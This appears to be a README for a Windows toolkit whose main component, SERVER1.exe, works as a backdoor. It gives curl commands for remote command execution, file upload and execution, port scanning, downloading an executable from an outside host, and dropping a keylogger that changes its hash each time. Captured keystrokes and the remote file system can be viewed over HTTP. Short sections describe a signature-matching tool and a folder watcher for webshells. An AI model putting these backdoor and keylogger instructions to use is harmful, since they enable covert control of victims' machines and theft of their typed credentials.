SERVER1.exe
- • Upload a file
- • Execute a file
- • Execute a command
- • Drop a key logger and execute it
- • Watch the activity on a separate channel / port
- • Request URL
On start (double click) you should see the following window (It says UD). MAKE SURE TO CREATE A FOLDER NAMED ud. This will be the root folder.
The app has opened 2 ports 8000 & 8001. Now we are ready to interact with it
URL’s
- • http://<remoteIp>:8000 // VIEW ALL FILES
- • http://<remoteIp>:8001/command // EXECUTE A COMMAND
- • http://<remoteIp>:8001/up // Upload a file
- • http://<remoteIp>:8001/port // Run a portScan
- • http://<remoteIp>:8001/url // Request a URL
- • http://<remoteIp>:8001/drop // Drop a keyLogger with a new hash each time
Execute a command:
curl -A "ipconfig /all” http://<remoteIp>:8001/command
Upload a file
curl -F “ud=@fileName” ipAddressofServer:8001/up
Execute an uploaded executable
curl -A “cmd /c ud\uploadedFile.exe” http://<remoteIp>:8001/command
Start a port scan (Not a full Scan)
curl -A “8.8.8.8” http://<remoteIp>:8001/port
Request a URL
curl -A “http://1.2.3.4/VerybadAss.exe” http://<remoteIp>:8001/url
Should be stored with a randomName
Drop a KeyLogger
curl http://<remoteIp>:8001/drop
FileName is file0.txt
To execute keyLogger
curl -A “cmd /c ud\file0.txt” http://<remoteIp>:8001/command
Keys are stored in X.HTML
To view the files, Open the BROWSER and point to:
http://<remoteIP>:8000/
This will give you the view of all files on the remote machine (ROOT FOLDER)
View KeyLog, click on x.html
SIGM.exe
Signature MATCH Tool.
Usage: sigm.exe <FolderPath> <SignatureInHex> // NOSPACES
More to come: Multithreaded tool with multiple signatures or a signature file option
sigm.exe c:\users\420\Desktop 800001020408102040800001020408102040800001020408102
watch_f_d.exe
Folder Watch tool. Could be used to look for webshells etc
watch_f_d.exe <FolderPath1>
watch_f_d.exe <FolderPath2>
watch_f_d.exe <FolderPathN>
If you run the same command again, it will ONLY show newly added or modified fileNames
procWatch.exe
THE END